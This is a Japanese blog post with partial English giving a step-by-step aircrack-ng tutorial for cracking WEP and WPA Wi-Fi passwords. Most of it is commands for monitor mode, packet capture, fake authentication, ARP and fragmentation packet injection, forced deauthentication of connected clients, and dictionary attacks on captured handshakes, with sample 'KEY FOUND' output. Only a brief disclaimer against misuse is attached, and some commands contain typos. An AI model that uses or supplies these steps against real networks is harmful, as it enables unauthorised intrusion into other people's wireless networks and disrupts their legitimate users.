無線LANは超危険!?Aircrack-ngで検証と使い方まとめ - パソコン1台でネット副業、クレジットカード節約の虎!


スポンサーサイト

スポンサードリンク
上記の広告は1ヶ月以上更新のないブログに表示されています。
新しい記事を書く事で広告が消せます。

無線LANは超危険!?Aircrack-ngで検証と使い方まとめ

スポンサードリンク
aircrack-ngを使ったWi-FiのWEPとWPAのパスワード解析方法を外国の友人から教えて欲しいと言われたので、せっかくなので日本語と英語で紹介してみます。

以前に「無線LANのWPA/WPA2-PSKをGPUで超高速解析してパスワードを見つけるフリーのオープンソースソフト「Pyrit」」なる記事を読んで、いつか検証してみようと思ってたので、実際にaircrack-ngを使ってみました。

私が検証した環境ではなんとWEPとWPA両方、解析できてしまった。
無線LANのセキュリティを検証するために行っています。悪用はしないで下さいね。 英語は苦手なので、ニュアンスで適当に書いてますのであしからず。。。

WEP解析とWPA解析で共通の手順
(Common steps WEP and WPA)

WEPとWPAのパスワード解析はAircrack-ngのLinux版を使います。私はubuntuでAircrack-ngを使いました。
Aircrack-ngのubuntuへのインストールはアプリケーションマネージャ > Aircrack-ngを検索 > インストール 環境構築の手順はもし要望があれば書きたいと思います。

インターフェースにモニターモードを追加
(add interface monitor mode)

管理者権限で実行できるようにして、インターフェースにモニターモードと追加します。
新しいターミナルを立ち上げる毎に、管理者権限を設定して下さい。
ターミナルを立ち上げて(Terminal 1)次のコマンドを実行します。
# Start another console session and enter
# change authority to Administrator 
sudo -i
su -

# disable network adapter
airmon-ng stop wlan0

# add monitor mode network adapter
airmon-ng start wlan0

# check signal around you
# stop dump after you choiced target "CTRL + C"
airodunmp-ng mon0
airodump-ng で周囲の無線LANを確認して、解析するターゲットを選びます。

パスワード解析に必要なパケットを収集
(Collect the required packets for crack password)

ターミナルを立ち上げて(Terminal 2)次のコマンドを実行します。
# Start another console session and enter
# start capture packet
airodump-ng -c (channel No) --bssid (BSSID) -w (capture file name) mon0

パケットデータの増加が充分なら、以下の手順は必要ないので解析の手順へ進む。もし充分なパケットデータが集まらない場合は、パケットインジェクションをして下さい。
If the packet gets traction if sufficient data, please use the packet injection.

アクセスポイントに認証要求する
(Authentication requests to the access point)

ターミナルを立ち上げて(Terminal 3)次のコマンドを実行します。
# Start another console session and enter
# Fake authentication
aireplay-ng -1 0 -e (ESSID) -a (BSSID) -h (your MAC adress) mon0

# exsample output of got Authentication
Waitig for beacon frame (BSSID: 00:11:22:33:44:55)
Sending Authentication Request 
Authentication successful 
Sending Association Request 
Association successful :-) 

このようなメッセージが出たら認証要求に成功です。

WPAパスワード解析の場合(when encryption is wpa)
ここでクライアントの再認証が発生すればハンドシェイクデータを取得できます。 パケット収集中のターミナルの右上に[WPA handshake: 00:11:22:33:44:55]こんなメッセージが出ているはずです。
# example output of handshake data
CH  9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:11:22:33:44:55
                                                                             
  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                             
  00:11:22:33:44:55   39 100       51      116   14   9  54  WPA2 CCMP   PSK  sample

WEPのパケットインジェクション(Packet Injection for WEP)

パケットデータの増加が遅い場合は、パケットインジェクションで強制的にパケットデータを増やすことができます。
パケットインジェクションは2通りの方法があります。
You can increase the data packet in the packet injection force.

正規のクライアントがARPしている場合
(When the client is connected)

# Use Terminal 3
aireplay-ng -3 -b (BSSID) -h (sauce MAC adress) mon0

正規のクライアントがARPしていない場合
(When the client is not connected)

新しいターミナルを立ち上げ、次のコマンドを実行。
# Use Terminal 3
# Fragmentation Attack
aireplay-ng -5 -b (BSSID) -h (souce MAC adress) mon0

# Make ARP Request
packetforge-ng -0 -a (BSSID) -h (souce MAC adress) -k (target ip adress) -l (souce ip adress) -y (xor file name) -w (save file name)

# Generate traffic
aireplay-ng -2 -r (save file name) mon0

WAPの強制認証解除
(Forced release of WAP authentication)

クライアントの接続を強制的に切らせて無理やり再接続させてやるのがこのやり方 さらに再接続中に、ESSIDやキーストリーム(keystream)も検知できるかもしれないおまけ付き
# Typical Deauthentication
aireplay-ng --deauth 5 -a (BSSID) -c (MAC address of the client you are deauthing) rausb0

# exsample
aireplay-ng --deauth 5 -a 00:01:02:03:04:05 -c 00:04:05:06:07:08 mon0

上手くいかない場合は、無線LANチップのメーカーを確認しましょう。
無線LANのチップがAtherosでない方はUSBタイプのを使用したほうが、すんなり上手くいきますよ。

WEPのパスワード解析(Analysis of the WEP password)

新しいターミナル(Terminal 4)を立ち上げ、次のコマンドを実行。
# Start another console session and enter
aircrack-ng (capture file name).cap

WAPのパスワード解析(Analysis of the WAP password)

新しいターミナル(Terminal 4)を立ち上げ、次のコマンドを実行。
WAPの場合は辞書ファイルによるブルートフォースアタックを行いますので、辞書ファイルの精度が大事です。 airodumpの画面でハンドシェイクデータが取得できていないと、解析できません。
# Start another console session and enter
aircrack-ng -w (password list) (capture file name).cap

# exsample
aircrack-ng -w dictionary.txt sample.cap

パスワード解析結果(Results of the analysis Password)

WAP、WEPのパスワードの解析が終了すると次のようにKEY FOUNDと表示されます。
                   Aircrack-ng 1.0


     [00:00:00] 2 keys tested (37.20 k/s)


             KEY FOUND! [ 12345678 ]


    Master Key     : CD 69 0D 11 8E AC AA
                     B8 A6 13 C5 4A 72 82
 
    Transcient Key : 06 F8 BB F3 B1 55 AE
                     CE 8A 9D A0 FC ED A6
                     FF 1D 41 E1 65 17 93
                     2B 20 90 8C EA 32 15
 
    EAPOL HMAC     : 4E 27 D9 5B 00 91 53
参考サイト : Main [Aircrack-ng]
使用は自己責任でお願いします。
Please use at your own risk


aircrackの動作環境がintelの場合の方はこちら

無線LANのチップがAtherosでない方から、うまくいかないという質問が多いので追記しておきます。
解決方法としては、パッチを当てるかUSB無線LANアダプタを買ってしまうかのどちらかになると思います。
パッチは知識を持っている方でしたらできると思いますが、てっとりばやくUSB無線LANアダプタを買ってしまうのが安全で確実でいいと思います。
パッチあてに失敗して自分のアクセスポイントにも繋がらなくなってしまっては、もともこもありませんからね。

一応Atherosチップ搭載の無線LANアダプタを調べておきました。

関連記事

コメント
非公開コメント

Re: 質問です!!

「ubuntuへのインストールはアプリケーションマネージャ > Aircrack-ngを検索 > インストール」の後に、コマンド入力にて「aircrack-ng」で起動すると思います。
だいぶ前に使って以来なのでうろ覚えですが。。。
また何かありましたら、ご質問ください。

2013-09-29 21:20 | from マケドニア

質問です!!

とてつもなく後になってからの書き込みですが、回答どうか宜しくお願いします。
UbuntuをMacにインストールして使用しています。こちらの記事を拝見してair-crackをペンギンの森から辿ってダウンロードまでは出来ましたが、どうしてもアプリケーションが開けません。ファイルは見えますがどの項目をたどっていっても開くことが出来ません。どこから開けばいいのでしょうか?恥ずかしながらコマンドやらクラックやら以前にLinuxにはほとんど知識がありません。優しく教えて頂けると有難いです。

2013-09-28 18:47 | from そらとぶどら焼き | Edit

トラックバック

http://overseasexp.blog79.fc2.com/tb.php/32-f3c40feb

移転しました

移転しました パソコン1台でネット副業、クレジットカード節約の虎! http://overseasexp.blog79.fc2.com/ マケドニア在住SEが送る!ずぼらなビール好きでもできた節約術、フリーソフトの紹介やiPhoneアプリなどjava開発情報。これからは放射能汚染情報も追跡...

2012-01-12 05:46 | from IMPOSSIBLE IS NOTHING.

上記広告は1ヶ月以上更新のないブログに表示されています。新しい記事を書くことで広告を消せます。